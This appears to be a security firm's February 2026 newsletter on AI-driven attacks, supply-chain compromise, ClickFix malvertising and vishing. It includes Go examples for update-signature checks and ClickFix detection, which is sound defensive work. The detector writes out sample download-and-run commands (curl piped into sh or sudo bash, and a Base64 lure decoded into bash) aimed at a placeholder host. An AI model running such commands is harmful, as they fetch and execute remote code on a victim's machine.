Feb 2026 Cloaked In Security

The Fifth Wave

From the Desk of the CISO

The "Fifth Wave" of Cyberattacks

The threat landscape of 2026 has reached a definitive tipping point. We have moved from an era of hacking driven by individual human skill into what researchers call the "Fifth Wave" of cybercrime: the industrialization of the cyber offense.

According to recent investigations by Group-IB, this wave is defined by the conversion of bundles of human skills, such as persuasion, impersonation, and malware development, into automated, globally scalable services enabled by AI. The barrier to entry into high-level cybercrime has vanished: today, a relative beginner can deploy advanced tactics, techniques, and procedures using AI agents that write and conduct the attacks for them.

The shift is defined by four key escalations:

  • Cheap Identity Kits: Black-market "synthetic identity kits" are now a commodity thanks to mainstream AI access. For as little as $5 USD, attackers can purchase AI video actors, cloned voices, and biometric datasets designed to bypass KYC and biometric authentication.

  • Agentic Phishing: Autonomous AI agents now draft bespoke lures, manage delivery, and pivot their strategy in real time based on how your employees interact.

  • Nytheon AI & Threat-Actor LLMs: Threat actors have moved beyond simple prompt injection against public tools. They now deploy proprietary, self-hosted models such as Nytheon AI, an 80-billion-parameter hybrid model built specifically to generate malware and disinformation without ethical restrictions.

  • The "New Perimeter" Vulnerability: Attacks such as DOM-Based Extension Clickjacking prove that even browser-based password managers that were previously considered secure can be weaponized. By hijacking the browser's Document Object Model, attackers can trick employees into exfiltrating their own vault credentials with a single click.

Immediate Actions for the CISO

  1. Stop relying on SMS and voice MFA as the only lock: Both are weak against AI-powered SIM swapping and vishing. Consider phishing-resistant controls such as FIDO2 security keys, even if only as the second factor.

  2. Audit "Shadow AI" alongside Shadow IT: 63% of organizations lack a formal policy for internal AI usage. Without strict controls, your own employees may inadvertently cause a massive data leak.

  3. Harden the Browser: Treat all extensions as privileged applications. Any plugin that injects code into the DOM (including some password managers) must be reviewed for clickjacking vulnerabilities. Consider restricting which browsers may be deployed in your enterprise environment, and control downloads through work profiles and other IT management tools.

  4. Zero Trust for Identity: Transition to a model where access is continuously verified based on identity, role, and real-time context. Do not rely on one-time logins in an era of synthetic identity.

  5. Secure the Help Desk: Implement "On-Camera" verification for password and MFA resets. Group-IB and others note a sharp rise in "vishing" where attackers manipulate help desk staff to bypass security controls.

___________________________________________________________________________

Company News

New Year, New Devices

It's an exciting time launching into 2026 with our brand new phones, laptops, and gaming consoles. But as we connect these new devices to our home networks, it's important to stay aware of the potential cyber risk. Thankfully, staying safe doesn't have to feel overly technical or stressful. This online guide walks you through easy steps to secure your devices, protect your home network, and spot warning signs of cyber threats. View the Smart Security Setup Guide

A Guide to Data Protection for Influencers & Celebrities

For today’s influencers and celebrities, visibility is a double-edged sword. The same content that grows your audience also expands your attack surface. Every livestream, podcast appearance, behind-the-scenes post, or branded collaboration unintentionally exposes pieces of your identity, routines, and digital life. Unlock the high-impact protections every influencer and public figure needs to know to halt—and prevent—the cyberattacks that damage careers. Read the blog

Why This Cybersecurity Advice Isn't 'Hacklore' For the High-Net-Worth Individual

Dozens of current and former security leaders recently wrote an open letter urging recipients to avoid outdated advice, or "hacklore", around digital risk. However, there's one important caveat: this doesn't necessarily apply to high-risk individuals. Join BlackCloak Cybersecurity Engineer Mike Lamberth for a discussion on why this advice is still very relevant for the high-net-worth individual to secure their digital footprint. Listen to the Podcast

Other news worth noting

Economic Espionage Leads to Conviction

A federal jury in San Francisco convicted a former Google software engineer on seven counts of economic espionage and seven counts of theft of trade secrets after the engineer exfiltrated over 2,000 pages of confidential data. Read more

Notepad++ Compromised

In December 2025, the Notepad++ update system was compromised by suspected Chinese state-sponsored hackers in a sophisticated supply-chain attack. The attackers redirected users to malicious servers that delivered malware instead of legitimate updates. Notepad++ has since moved to a more secure hosting environment and released version 8.9.1, which includes mandatory digital signature verification for all updates to prevent future hijacks. Read more
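The control the Notepad++ item describes, signature verification before an update is applied, is worth seeing end to end. The following is an added example and not Notepad++'s own updater code: a publisher signs a small update manifest with an Ed25519 release key; the client carries a pinned copy of the publisher's public key and refuses any download whose manifest signature or payload digest does not check out, which is what defeats a hijacked update server. The manifest layout, the "example-editor" product name and the payload bytes are constructed for illustration.

```go
package main

import (
	"crypto/ed25519"
	"crypto/rand"
	"crypto/sha256"
	"encoding/hex"
	"errors"
	"fmt"
)

// UpdateManifest is the metadata a publisher releases alongside an installer.
// Only the manifest is signed; the payload is bound to it through its digest.
// (Hypothetical format, constructed for this example.)
type UpdateManifest struct {
	Product string
	Version string
	Digest  string // hex-encoded SHA-256 of the payload
}

// canonical renders the manifest in a fixed byte layout so the signer and the
// verifier operate on exactly the same bytes.
func (m UpdateManifest) canonical() []byte {
	return []byte(m.Product + "\n" + m.Version + "\n" + m.Digest + "\n")
}

// NewManifest computes the payload digest and fills in the manifest.
func NewManifest(product, version string, payload []byte) UpdateManifest {
	sum := sha256.Sum256(payload)
	return UpdateManifest{Product: product, Version: version, Digest: hex.EncodeToString(sum[:])}
}

// SignManifest runs on the publisher's side with the release signing key.
func SignManifest(priv ed25519.PrivateKey, m UpdateManifest) []byte {
	return ed25519.Sign(priv, m.canonical())
}

var (
	ErrBadSignature   = errors.New("manifest signature does not verify against the pinned publisher key")
	ErrDigestMismatch = errors.New("payload digest does not match the signed manifest")
)

// VerifyUpdate runs on the client before any downloaded bytes are executed.
// The public key is pinned in the installed binary, so a redirected download
// server cannot substitute its own key along with its own payload.
func VerifyUpdate(pinnedPub ed25519.PublicKey, m UpdateManifest, sig, payload []byte) error {
	// 1. The manifest must carry a valid signature from the publisher.
	if !ed25519.Verify(pinnedPub, m.canonical(), sig) {
		return ErrBadSignature
	}
	// 2. The payload must be the exact bytes the signed manifest describes.
	sum := sha256.Sum256(payload)
	if hex.EncodeToString(sum[:]) != m.Digest {
		return ErrDigestMismatch
	}
	return nil
}

func main() {
	pub, priv, err := ed25519.GenerateKey(rand.Reader)
	if err != nil {
		panic(err)
	}
	payload := []byte("constructed stand-in for a real installer")
	m := NewManifest("example-editor", "8.9.1", payload)
	sig := SignManifest(priv, m)

	fmt.Println("genuine update:", VerifyUpdate(pub, m, sig, payload))
	// A redirected download that serves different bytes fails the digest check.
	fmt.Println("swapped payload:", VerifyUpdate(pub, m, sig, []byte("malware")))
	// A manifest rewritten to describe the malware fails the signature check,
	// because the attacker does not hold the publisher's private key.
	forged := NewManifest("example-editor", "8.9.1", []byte("malware"))
	fmt.Println("forged manifest:", VerifyUpdate(pub, forged, sig, []byte("malware")))
}
```

The order of the two checks matters: the signature is verified first so that an attacker-controlled digest is never trusted, and the digest is then compared against the bytes actually downloaded, not against anything the server claims about them.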

Malicious, Clickfix-Styled Mac Cleaner Attack

Researchers have recently discovered a sophisticated malvertising campaign using Google Ads to target Mac users with fake "system cleaning" tools. The ads redirect victims to convincing replicas of Apple’s support site where they are tricked into pasting a malicious Base64-encoded command into their macOS Terminal. This command bypasses standard security checks to download a script that gives attackers remote control over the device, enabling them to steal sensitive files, extract SSH keys, or deploy cryptominers. Read more
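A ClickFix lure only succeeds when the pasted command runs, so the detection opportunity is the command line itself, whether it comes from shell history or from EDR process telemetry. The following is an added example and not from the researchers' report: it flags a Base64 blob that is decoded straight into a shell, decodes the blob so an analyst can review the hidden command, and also catches plain download-and-run pipelines. The sample history lines and the example.invalid host are constructed; the lure line is encoded at runtime so the sample is exactly what a victim would have pasted.

```go
package main

import (
	"encoding/base64"
	"fmt"
	"regexp"
	"strings"
)

// Finding is one command line that matches a ClickFix-style pattern.
type Finding struct {
	Line    string
	Decoded string   // hidden command recovered from the Base64 blob, if any
	Reasons []string // why the line was flagged
}

var (
	// A run of Base64 alphabet characters long enough to hide a command.
	b64Blob = regexp.MustCompile(`[A-Za-z0-9+/]{16,}={0,2}`)
	// base64 -d / -D / --decode is the decode step of the lure.
	decodeStep = regexp.MustCompile(`\bbase64\s+(-d|-D|--decode)\b`)
	// Output piped into an interpreter, optionally via sudo.
	shellSink = regexp.MustCompile(`\|\s*(sudo\s+)?(ba|z)?sh\b`)
	// Fetching remote content is the other half of download-and-run.
	remoteFetch = regexp.MustCompile(`\b(curl|wget)\b`)
)

// AnalyzeCommand inspects one command line and reports whether it matches.
func AnalyzeCommand(line string) (Finding, bool) {
	f := Finding{Line: line}

	// Pattern 1: a Base64 blob decoded straight into a shell. Decoding it
	// ourselves turns an opaque string into a command an analyst can read.
	if decodeStep.MatchString(line) && shellSink.MatchString(line) {
		f.Reasons = append(f.Reasons, "base64 decode piped into a shell")
		if blob := b64Blob.FindString(line); blob != "" {
			if raw, err := base64.StdEncoding.DecodeString(blob); err == nil {
				f.Decoded = strings.TrimSpace(string(raw))
			}
		}
	}

	// Pattern 2: a remote fetch piped into a shell, whether it is visible in
	// the line itself or only inside the decoded payload.
	for _, text := range []string{line, f.Decoded} {
		if remoteFetch.MatchString(text) && shellSink.MatchString(text) {
			f.Reasons = append(f.Reasons, "remote fetch piped into a shell")
			break
		}
	}
	return f, len(f.Reasons) > 0
}

// ScanHistory runs AnalyzeCommand over a batch of command lines.
func ScanHistory(lines []string) []Finding {
	var out []Finding
	for _, l := range lines {
		if f, hit := AnalyzeCommand(l); hit {
			out = append(out, f)
		}
	}
	return out
}

func main() {
	// Constructed sample history. The hidden command is encoded at runtime.
	hidden := "curl -fsSL https://example.invalid/cleaner.sh | sh"
	lure := `echo "` + base64.StdEncoding.EncodeToString([]byte(hidden)) + `" | base64 -d | bash`
	history := []string{
		"ls -la ~/Downloads",
		"cat key.b64 | base64 -d > key.bin", // legitimate decode, no shell sink
		lure,
		"curl -s https://example.invalid/x.sh | sudo bash",
	}
	for _, f := range ScanHistory(history) {
		fmt.Printf("FLAGGED: %s\n  reasons: %v\n  decoded: %q\n", f.Line, f.Reasons, f.Decoded)
	}
}
```

The benign `base64 -d > key.bin` line is included deliberately: requiring both the decode step and a shell sink keeps ordinary uses of base64 out of the alert queue, and surfacing the decoded text lets a responder confirm the intent without re-running anything.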

ShinyHunters Vishing & Extortion Campaign

In January 2026, ShinyHunters launched a widespread vishing campaign targeting hundreds of organizations. By impersonating IT support staff in live phone calls, the attackers manipulated employees into bypassing multi-factor authentication or authorizing malicious OAuth applications disguised as legitimate business tools. This aggressive strategy, which mirrors tactics used by Scattered Spider, has enabled the group to exfiltrate gigabytes of sensitive corporate and customer data. Read more